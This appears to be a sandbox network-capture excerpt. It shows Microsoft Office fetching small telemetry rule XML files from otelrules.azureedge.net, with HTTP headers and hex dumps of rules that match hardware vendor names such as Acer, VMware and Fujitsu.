                                                  2024-12-09 08:35:30 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  46192.168.2.44981113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:29 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:30 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:29 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 486
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                  ETag: "0x8DC582BB344914B"
                                                  x-ms-request-id: 3fcfbabf-e01e-0052-0903-48d9df000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083529Z-r1cf579d778d5zkmhC1EWRk6h8000000086g000000005maq
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:30 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  47192.168.2.44981313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:30 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:31 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:31 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 486
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                  ETag: "0x8DC582B9018290B"
                                                  x-ms-request-id: 3861519e-b01e-001e-7e3f-490214000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083531Z-r1cf579d778t76vqhC1EWRdx4w00000001r0000000006nq3
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:31 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  48192.168.2.44981413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:31 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:32 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:32 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 469
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                  ETag: "0x8DC582BBA701121"
                                                  x-ms-request-id: 3bfd724e-501e-0016-6705-48181b000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083532Z-r1cf579d778t6txphC1EWRsd4400000008a0000000003zz6
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:32 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  49192.168.2.44981513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:31 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:32 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:32 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 407
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                  ETag: "0x8DC582B9698189B"
                                                  x-ms-request-id: fc439136-701e-0053-5f66-493a0a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083532Z-r1cf579d778x776bhC1EWRdk8000000007t00000000050ts
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:32 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  50192.168.2.44981613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:31 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:32 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:32 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                  ETag: "0x8DC582BA41997E3"
                                                  x-ms-request-id: 1f14184f-601e-0050-3802-482c9c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083532Z-r1cf579d778x776bhC1EWRdk8000000007vg000000003157
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:32 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  51192.168.2.44981713.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:31 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:32 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:32 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 477
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                  ETag: "0x8DC582BB8CEAC16"
                                                  x-ms-request-id: fff301c7-601e-0097-4606-48f33a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083532Z-r1cf579d7789trgthC1EWRkkfc00000008g0000000003qsg
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:32 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  52192.168.2.44981913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:32 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:33 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:33 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 464
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                  ETag: "0x8DC582B97FB6C3C"
                                                  x-ms-request-id: 30dd9f76-001e-0066-6f82-49561e000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083533Z-r1cf579d7789jf56hC1EWRu5880000000330000000000ezf
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:33 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  53192.168.2.44982013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:33 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:34 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:34 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                  ETag: "0x8DC582B9748630E"
                                                  x-ms-request-id: bd44ec9f-201e-003f-366e-496d94000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083534Z-r1cf579d7782v2q5hC1EWRt9bw00000002q0000000000q49
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:34 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  54192.168.2.44982113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:33 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:34 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:34 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 494
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                  ETag: "0x8DC582BB7010D66"
                                                  x-ms-request-id: 229463e4-b01e-0021-2a03-48cab7000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083534Z-r1cf579d7788pwqzhC1EWRrpd8000000087g000000000der
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:34 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  55192.168.2.44982313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:33 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:34 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:34 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 404
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                  ETag: "0x8DC582B9E8EE0F3"
                                                  x-ms-request-id: 987987f9-101e-0034-0e02-4896ff000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083534Z-r1cf579d7786c2tshC1EWRr1gc00000007hg000000001rp3
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:34 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  56192.168.2.44982213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:33 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:34 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:34 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                  ETag: "0x8DC582B9DACDF62"
                                                  x-ms-request-id: ebc14d87-b01e-0070-664c-491cc0000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083534Z-r1cf579d778l2x6lhC1EWRsptc00000000r0000000004yxz
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
